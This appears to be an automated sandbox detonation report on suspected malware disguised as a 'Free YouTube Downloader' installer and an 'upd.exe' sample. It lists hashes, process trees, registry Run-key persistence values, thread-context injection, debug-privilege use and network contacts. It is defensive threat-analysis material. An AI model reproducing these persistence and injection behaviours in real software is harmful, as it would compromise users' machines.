C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe

"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"

C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe

"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"

C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe

"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"

Network

N/A

Files

\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe

MD5 f33a4e991a11baf336a2324f700d874d
SHA1 9da1891a164f2fc0a88d0de1ba397585b455b0f4
SHA256 a87524035509ff7aa277788e1a9485618665b7da35044d70c41ec0f118f3dfd7
SHA512 edf066968f31451e21c7c21d3f54b03fd5827a8526940c1e449aad7f99624577cbc6432deba49bb86e96ac275f5900dcef8d7623855eb3c808e084601ee1df20

memory/2380-28-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2240-29-0x000007FEF5B03000-0x000007FEF5B04000-memory.dmp

memory/2240-30-0x00000000012F0000-0x000000000131E000-memory.dmp

memory/2240-31-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

memory/2240-32-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

memory/2240-33-0x000007FEF5B03000-0x000007FEF5B04000-memory.dmp

memory/2240-34-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe

MD5 1bb4dd43a8aebc8f3b53acd05e31d5b5
SHA1 54cd1a4a505b301df636903b2293d995d560887e
SHA256 a2380a5f503bc6f5fcfd4c72e5b807df0740a60a298e8686bf6454f92e5d3c02
SHA512 94c70d592e806bb426760f61122b8321e8dc5cff7f793d51f9d5650821c502c43096f41d3e61207ca6989df5bfdbff57bc23328de16e99dd56e85efc90affdce

memory/1820-37-0x00000000001C0000-0x0000000000234000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

118s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Setup (6).exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Setup (6).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Setup (6).exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe" C:\Users\Admin\AppData\Local\Temp\Setup (6).exe N/A

Checks installed software on the system

discovery

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe C:\Users\Admin\AppData\Local\Temp\Setup (6).exe N/A
File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\Setup (6).exe N/A
File created C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.ini C:\Users\Admin\AppData\Local\Temp\Setup (6).exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Setup (6).exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Setup (6).exe

"C:\Users\Admin\AppData\Local\Temp\Setup (6).exe"

C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe

"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"

Network

N/A

Files

C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe

MD5 d7dccd844047a41ecda204295c4f3743
SHA1 21ee4ead319c6cd4b7568fef42da637945b15793
SHA256 9db8971c38f1803f7afc80a8c332ca93d69d084f39ea119f9c28c02ee1ed9166
SHA512 fe249bc49dfa9ea80594370c94b6f1344e91f91d7b378265472706eb35ac6fbeba02c13af95dfebd045cf6ff3a59cb32bc7893dfa686ab15059a6c9a3ac5833a

memory/2008-24-0x0000000000400000-0x000000000043C000-memory.dmp

memory/1148-26-0x000007FEF5D13000-0x000007FEF5D14000-memory.dmp

memory/1148-27-0x0000000000D40000-0x0000000000D6E000-memory.dmp

memory/1148-28-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

memory/1148-29-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

memory/1148-30-0x000007FEF5D13000-0x000007FEF5D14000-memory.dmp

memory/1148-31-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20241010-en

Max time kernel

301s

Max time network

173s

Command Line

"C:\Users\Admin\AppData\Local\Temp\upd.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\vasja = "C:\\Users\\Admin\\AppData\\Local\\Temp\\upd.exe" C:\Users\Admin\AppData\Local\Temp\upd.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3056 set thread context of 2244 N/A C:\Users\Admin\AppData\Local\Temp\upd.exe C:\Users\Admin\AppData\Local\Temp\upd.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\upd.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\upd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\upd.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\upd.exe

"C:\Users\Admin\AppData\Local\Temp\upd.exe"

C:\Users\Admin\AppData\Local\Temp\upd.exe

"C:\Users\Admin\AppData\Local\Temp\upd.exe"

Network

Country Destination Domain Proto
NL 89.248.165.131:80 tcp
NL 89.248.165.131:80 tcp
US 8.8.8.8:53 tools.ip2location.com udp
US 149.248.7.185:80 tools.ip2location.com tcp
US 149.248.7.185:443 tools.ip2location.com tcp
US 149.248.7.185:443 tools.ip2location.com tcp
US 149.248.7.185:443 tools.ip2location.com tcp
US 149.248.7.185:443 tools.ip2location.com tcp

Files

memory/3056-0-0x0000000000401000-0x0000000000402000-memory.dmp

memory/3056-1-0x0000000000400000-0x000000000042B000-memory.dmp

memory/2244-2-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2244-9-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2244-6-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2244-4-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/3056-8-0x0000000000400000-0x000000000042B000-memory.dmp

memory/2244-10-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2244-27-0x0000000000400000-0x0000000000420000-memory.dmp